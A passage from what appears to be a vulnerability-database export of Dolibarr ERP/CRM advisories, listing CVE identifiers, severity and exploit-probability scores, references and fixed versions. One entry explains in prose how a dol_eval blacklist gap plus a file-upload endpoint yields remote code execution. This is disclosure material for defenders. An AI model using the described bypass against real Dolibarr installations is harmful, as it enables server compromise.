url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/
url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31019
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31019
5
reference_url https://github.com/advisories/GHSA-j2g9-rprv-hrhc
reference_id GHSA-j2g9-rprv-hrhc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j2g9-rprv-hrhc
fixed_packages
aliases CVE-2026-31019, GHSA-j2g9-rprv-hrhc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8fjr-6hdm-vqdd
9
url VCID-d4uk-4adf-mba9
vulnerability_id VCID-d4uk-4adf-mba9
summary 
Dolibarr Improper Input Validation vulnerability
Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-4198
reference_id
reference_type
scores
0
value 0.00079
scoring_system epss
scoring_elements 0.23625
published_at 2026-06-05T12:55:00Z
1
value 0.00079
scoring_system epss
scoring_elements 0.23562
published_at 2026-06-07T12:55:00Z
2
value 0.00079
scoring_system epss
scoring_elements 0.23608
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-4198
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb
3
reference_url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/
url https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b
4
reference_url https://starlabs.sg/advisories/23/23-4198
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/
url https://starlabs.sg/advisories/23/23-4198
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-4198
reference_id CVE-2023-4198
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-4198
6
reference_url https://github.com/advisories/GHSA-48v2-596x-4jr9
reference_id GHSA-48v2-596x-4jr9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-48v2-596x-4jr9
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.0
purl pkg:composer/dolibarr/dolibarr@18.0.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0
aliases CVE-2023-4198, GHSA-48v2-596x-4jr9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d4uk-4adf-mba9
10
url VCID-egxz-r3nw-xffm
vulnerability_id VCID-egxz-r3nw-xffm
summary 
Incorrect Authorization
Improper Access Control (IDOR) in GitHub repository dolibarr/dolibarr prior to 16.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0731
reference_id
reference_type
scores
0
value 0.00135
scoring_system epss
scoring_elements 0.33076
published_at 2026-06-04T12:55:00Z
1
value 0.00135
scoring_system epss
scoring_elements 0.33154
published_at 2026-06-07T12:55:00Z
2
value 0.00135
scoring_system epss
scoring_elements 0.33193
published_at 2026-06-06T12:55:00Z
3
value 0.00135
scoring_system epss
scoring_elements 0.33179
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0731
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/209ab708d4b65fbd88ba4340d60b7822cb72651a
3
reference_url https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/e242ab4e-fc70-4b2c-a42d-5b3ee4895de8
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0731
reference_id CVE-2022-0731
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0731
5
reference_url https://github.com/advisories/GHSA-4xc7-x2jr-cr74
reference_id GHSA-4xc7-x2jr-cr74
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4xc7-x2jr-cr74
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0731, GHSA-4xc7-x2jr-cr74
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-egxz-r3nw-xffm
11
url VCID-ewrf-wdsh-kqgs
vulnerability_id VCID-ewrf-wdsh-kqgs
summary 
Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script
An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38886
reference_id
reference_type
scores
0
value 0.50447
scoring_system epss
scoring_elements 0.97898
published_at 2026-06-05T12:55:00Z
1
value 0.50447
scoring_system epss
scoring_elements 0.97899
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38886
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38886
reference_id CVE-2023-38886
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38886
5
reference_url https://github.com/advisories/GHSA-6773-rfjv-c54w
reference_id GHSA-6773-rfjv-c54w
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6773-rfjv-c54w
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38886, GHSA-6773-rfjv-c54w
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ewrf-wdsh-kqgs
12
url VCID-f122-u34a-kfcm
vulnerability_id VCID-f122-u34a-kfcm
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-5842
reference_id
reference_type
scores
0
value 0.0012
scoring_system epss
scoring_elements 0.30452
published_at 2026-06-07T12:55:00Z
1
value 0.0012
scoring_system epss
scoring_elements 0.30481
published_at 2026-06-06T12:55:00Z
2
value 0.0012
scoring_system epss
scoring_elements 0.30515
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-5842
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/
url https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c
3
reference_url https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/
url https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-5842
reference_id CVE-2023-5842
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-5842
5
reference_url https://github.com/advisories/GHSA-9pjf-jw9q-fx49
reference_id GHSA-9pjf-jw9q-fx49
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9pjf-jw9q-fx49
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.5
purl pkg:composer/dolibarr/dolibarr@16.0.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5
aliases CVE-2023-5842, GHSA-9pjf-jw9q-fx49
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f122-u34a-kfcm
13
url VCID-g3x8-rhqm-fuh2
vulnerability_id VCID-g3x8-rhqm-fuh2
summary 
Improper Input Validation
dolibarr is vulnerable to Business Logic Errors
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0174
reference_id
reference_type
scores
0
value 0.00244
scoring_system epss
scoring_elements 0.47826
published_at 2026-06-04T12:55:00Z
1
value 0.00244
scoring_system epss
scoring_elements 0.47876
published_at 2026-06-07T12:55:00Z
2
value 0.00244
scoring_system epss
scoring_elements 0.47893
published_at 2026-06-06T12:55:00Z
3
value 0.00244
scoring_system epss
scoring_elements 0.47889
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0174
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/d892160f4f130385a3ce520f66cb8cf2eb8c5c32
3
reference_url https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/ed3ed4ce-3968-433c-a350-351c8f8b60db
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0174
reference_id CVE-2022-0174
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0174
5
reference_url https://github.com/advisories/GHSA-8qvx-f5gf-g43v
reference_id GHSA-8qvx-f5gf-g43v
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8qvx-f5gf-g43v
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2022-0174, GHSA-8qvx-f5gf-g43v
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g3x8-rhqm-fuh2
14
url VCID-htgn-37m4-c7fu
vulnerability_id VCID-htgn-37m4-c7fu
summary 
Dolibarr Allows Code Injection through its Website Module
In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.

A patch is available at https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31018
reference_id
reference_type
scores
0
value 0.00049
scoring_system epss
scoring_elements 0.15516
published_at 2026-06-05T12:55:00Z
1
value 0.00049
scoring_system epss
scoring_elements 0.15468
published_at 2026-06-07T12:55:00Z
2
value 0.00049
scoring_system epss
scoring_elements 0.15508
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31018
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96
4
reference_url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
5
reference_url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/
url https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31018
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31018
7
reference_url https://github.com/advisories/GHSA-676v-wh57-p375
reference_id GHSA-676v-wh57-p375
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-676v-wh57-p375
fixed_packages
aliases CVE-2026-31018, GHSA-676v-wh57-p375
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-htgn-37m4-c7fu
15
url VCID-j345-dk2c-yfds
vulnerability_id VCID-j345-dk2c-yfds
summary 
Dolibarr has Remote Code Execution Vulnerability (Bypass)
The Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added Menu:

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164114688.png)

This is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:

- htdocs/admin/menus/edit.php

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164445656.png)

As you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the `blacklist` set in `$forbiddenphpfunctions`:

![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)

However, the `blacklist` here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the `blacklist` check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**
references
0
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
1
reference_url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/admin/menus/edit.php
2
reference_url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/blob/21.0.2/htdocs/user/document.php
3
reference_url https://github.com/advisories/GHSA-49xw-hw94-fmv2
reference_id GHSA-49xw-hw94-fmv2
reference_type
scores
url https://github.com/advisories/GHSA-49xw-hw94-fmv2
4
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2
reference_id GHSA-49xw-hw94-fmv2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-49xw-hw94-fmv2
fixed_packages
aliases GHSA-49xw-hw94-fmv2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j345-dk2c-yfds
16
url VCID-jbkd-su9m-3udy
vulnerability_id VCID-jbkd-su9m-3udy
summary 
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-5323
reference_id
reference_type
scores
0
value 0.00206
scoring_system epss
scoring_elements 0.42998
published_at 2026-06-07T12:55:00Z
1
value 0.00206
scoring_system epss
scoring_elements 0.43021
published_at 2026-06-06T12:55:00Z
2
value 0.00206
scoring_system epss
scoring_elements 0.43011
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-5323
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/
url https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15
3
reference_url https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/
url https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-5323
reference_id CVE-2023-5323
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-5323
5
reference_url https://github.com/advisories/GHSA-39m3-cj8c-886r
reference_id GHSA-39m3-cj8c-886r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-39m3-cj8c-886r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.0
purl pkg:composer/dolibarr/dolibarr@18.0.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0
aliases CVE-2023-5323, GHSA-39m3-cj8c-886r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jbkd-su9m-3udy
17
url VCID-k9nc-tze6-k7bx
vulnerability_id VCID-k9nc-tze6-k7bx
summary 
Dolibarr has Insufficient Verification of Data Authenticity
A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-7689
reference_id
reference_type
scores
0
value 9e-05
scoring_system epss
scoring_elements 0.01022
